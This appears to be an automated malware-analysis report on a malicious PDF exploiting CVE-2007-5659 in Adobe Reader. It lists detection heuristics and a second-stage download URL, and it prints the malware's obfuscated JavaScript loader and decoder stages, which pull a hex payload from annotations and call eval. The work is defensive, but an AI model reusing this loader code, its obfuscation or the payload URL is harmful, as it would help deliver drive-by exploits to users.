MALICIOUS
Risk Score: 366
Malware Insights
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF file contains heavily obfuscated JavaScript that exploits CVE-2007-5659 (the Collab.collectEmailInfo buffer overflow) in Adobe Reader. The first-stage script decodes its next stage from an annotation subject; the decoded shellcode carries a URL from which a second-stage payload is downloaded and executed. The embedded URL http://searchfunes.org/cgi-bin/153/n002106201r0019Rcc62cc8aX6da4853bY488ef576Z0100f060 is the second-stage download location and the key network indicator for this stage of the attack.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (10)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE match: exact; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(), one of a series of Acrobat JavaScript API exploits. Identified after static deobfuscation.
- JavaScript action (low; 5 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) (high; CVE match: likely; rule PDF_JS_ADOBE_APSB08_13_PATCH_GATE): PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1), the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behaviour.
- Obfuscated multi-stage PDF JavaScript dropper (high; rule PDF_JS_OBFUSCATED_DROPPER): PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers: OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible from static analysis of the first stage alone.
- PDF JavaScript shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute routine (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- ClamAV: Pdf.Exploit.Agent-35901 (critical; rule CLAMAV_DETECTION): ClamAV detected this file as malware: Pdf.Exploit.Agent-35901.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://searchfunes.org/cgi-bin/153/n002106201r0019Rcc62cc8aX6da4853bY488ef576Z0100f060 (referenced by PDF JavaScript).
Extracted artifacts (3)
Files carved from inside the sample during analysis.

Artifact: javascript_obj0005_000.js
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Kind: pdf-javascript-stream
Source: PDF /JS object 5 at offset 0x148
Size: 469 bytes
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token).
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
var num = 1;
pr = app.doc.getAnnots(
{
nPage: 0
}
);
sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
fnc += 'a';
var arr = sum.split(/-/);
for (var i = 1; i < arr.length; i++) {
buf += String.fromCharCode("0x"+arr[i]);
}
fnc += 'l';
}
if (app.plugIns.length >= 2)
{
app[fnc]/**/(buf);
}
Artifact: legacy_pdfkit_stage_000.js
SHA-256: 8fb18bc790c7c00fb4c55be04cb3782765d8c1c88cc1a45960c3ab6e68b5a54b
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x1AF0
Size: 12817 bytes
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token and 1 long base64-like blob).
Preview script (first 1,000 lines of the extracted script):
function v7g2__vQ0(dJ6_5__8j, Id_34B_UE){var A_7_XC38u_Q1 = 20;var Sx_Tdt__1ywcm = 0;var TPc4a_06_t4757c = 512;var R00__gy__AXoK = A_7_XC38u_Q1;var gG8533p6_v70p_l = "";var S2r__UlhrHE6J = 4;var D_srHlRB = this;var XJ80fer5_krH4_1 = "1234ee";var Nxs___jt = arguments;try {var u5K8aQ_8A = 0;if (app) {R00__gy__AXoK = R00__gy__AXoK + 2;Id_34B_UE = pr[u5K8aQ_8A].subject;}XJ80fer5_krH4_1 = XJ80fer5_krH4_1.replace(/\d+/, "call");} catch(e) { }R00__gy__AXoK = R00__gy__AXoK - A_7_XC38u_Q1;var faUS_VdjD_q1h = new Array();var Ycs__X280Mo1O1 = 150;if (Ycs__X280Mo1O1 > 0) {faUS_VdjD_q1h[0] = Ycs__X280Mo1O1;faUS_VdjD_q1h[1] = TPc4a_06_t4757c;faUS_VdjD_q1h[0] = faUS_VdjD_q1h[0] - Ycs__X280Mo1O1;faUS_VdjD_q1h[2] = faUS_VdjD_q1h[0];faUS_VdjD_q1h[1] = faUS_VdjD_q1h[1] - TPc4a_06_t4757c;faUS_VdjD_q1h[3] = faUS_VdjD_q1h[1];}if (dJ6_5__8j) { faUS_VdjD_q1h = dJ6_5__8j;}if (!dJ6_5__8j) {var FUJm__Lv2T = Nxs___jt[XJ80fer5_krH4_1].toString();var v_P0Uj_bP6 = 0;var h241Pp = v_P0Uj_bP6;Ycs__X280Mo1O1 = Ycs__X280Mo1O1 - 102;var r_03__E0_vw = 0;while(h241Pp < FUJm__Lv2T.length) {r_03__E0_vw = FUJm__Lv2T.charCodeAt(h241Pp);if (r_03__E0_vw >= Ycs__X280Mo1O1 && r_03__E0_vw <= 57) {if (v_P0Uj_bP6 == S2r__UlhrHE6J) {v_P0Uj_bP6 = -1;}if (v_P0Uj_bP6 < 0) { v_P0Uj_bP6 = 0; }faUS_VdjD_q1h[v_P0Uj_bP6] += r_03__E0_vw;if (faUS_VdjD_q1h[v_P0Uj_bP6] > TPc4a_06_t4757c) {faUS_VdjD_q1h[v_P0Uj_bP6] -= TPc4a_06_t4757c;}v_P0Uj_bP6 = v_P0Uj_bP6 + 1;}h241Pp = h241Pp + 1;}}var pb_33Y_iMI70I = 0;var L__KH1_m1T_BC7x = 0;var Kq_A_6R2k_iE87t = -1;var A7_q_D_g7dO_k = 0;var b___8__2Ygo = 0;do {var vQqF__i = 256;if (faUS_VdjD_q1h[A7_q_D_g7dO_k] > vQqF__i) {faUS_VdjD_q1h[A7_q_D_g7dO_k] -= vQqF__i;}A7_q_D_g7dO_k = A7_q_D_g7dO_k + 1;} while (A7_q_D_g7dO_k < S2r__UlhrHE6J);A7_q_D_g7dO_k = A7_q_D_g7dO_k - S2r__UlhrHE6J;while(A7_q_D_g7dO_k < Id_34B_UE.length) {var l2875A2o = Id_34B_UE.substr(A7_q_D_g7dO_k, 1) + ' V V ';A7_q_D_g7dO_k = A7_q_D_g7dO_k + 1;var Le__4_e_x__xDk4 = parseInt(l2875A2o, A_7_XC38u_Q1);if (Kq_A_6R2k_iE87t != 
-1) {L__KH1_m1T_BC7x += Le__4_e_x__xDk4;if (pb_33Y_iMI70I == S2r__UlhrHE6J) {pb_33Y_iMI70I = 0;}var WP_jCWo = L__KH1_m1T_BC7x;WP_jCWo = WP_jCWo - (b___8__2Ygo + 2) * faUS_VdjD_q1h[pb_33Y_iMI70I];if (WP_jCWo <= 0) {WP_jCWo = WP_jCWo - Math.floor(WP_jCWo / 256) * 256;}WP_jCWo = String.fromCharCode(WP_jCWo);if (R00__gy__AXoK == 1) {gG8533p6_v70p_l += Le__4_e_x__xDk4;} else if (R00__gy__AXoK == 2) {gG8533p6_v70p_l += WP_jCWo;} else {gG8533p6_v70p_l += A7_q_D_g7dO_k;Kq_A_6R2k_iE87t = -2;}Kq_A_6R2k_iE87t = -1;pb_33Y_iMI70I = pb_33Y_iMI70I + 1;b___8__2Ygo = b___8__2Ygo + 1;} else if (Kq_A_6R2k_iE87t == -1) {Kq_A_6R2k_iE87t = A_7_XC38u_Q1;L__KH1_m1T_BC7x = Le__4_e_x__xDk4 * A_7_XC38u_Q1;}}var F_0a_3j___OQQ_t = this;F_0a_3j___OQQ_t['ev'+'al'](gG8533p6_v70p_l);}
v7g2__vQ0(0, "
... (truncated)
Artifact: deobfuscated.js
SHA-256: 0c738159530d3f9327c32aa8ae29014e96d0115a069a1ed0be30e1ca5af018fc
Kind: deobfuscated-js
Source: PDF JavaScript deobfuscation pass
Size: 125500 bytes
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 9 eval/decoder/string-building tokens and 2 long base64-like blobs).
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';
app.doc.syncAnnotScan();
if (app.plugIns.length != 0) {
var num = 1;
pr = app.doc.getAnnots(
{
nPage: 0
}
);
sum = pr[num].subject;
}
var buf = "";
if (app.plugIns.length > 3) {
fnc += 'a';
var arr = sum.split(/-/);
for (var i = 1; i < arr.length; i++) {
buf += String.fromCharCode("0x"+arr[i]);
}
fnc += 'l';
}
if (app.plugIns.length >= 2)
{
app.eval(buf);
}
... (truncated)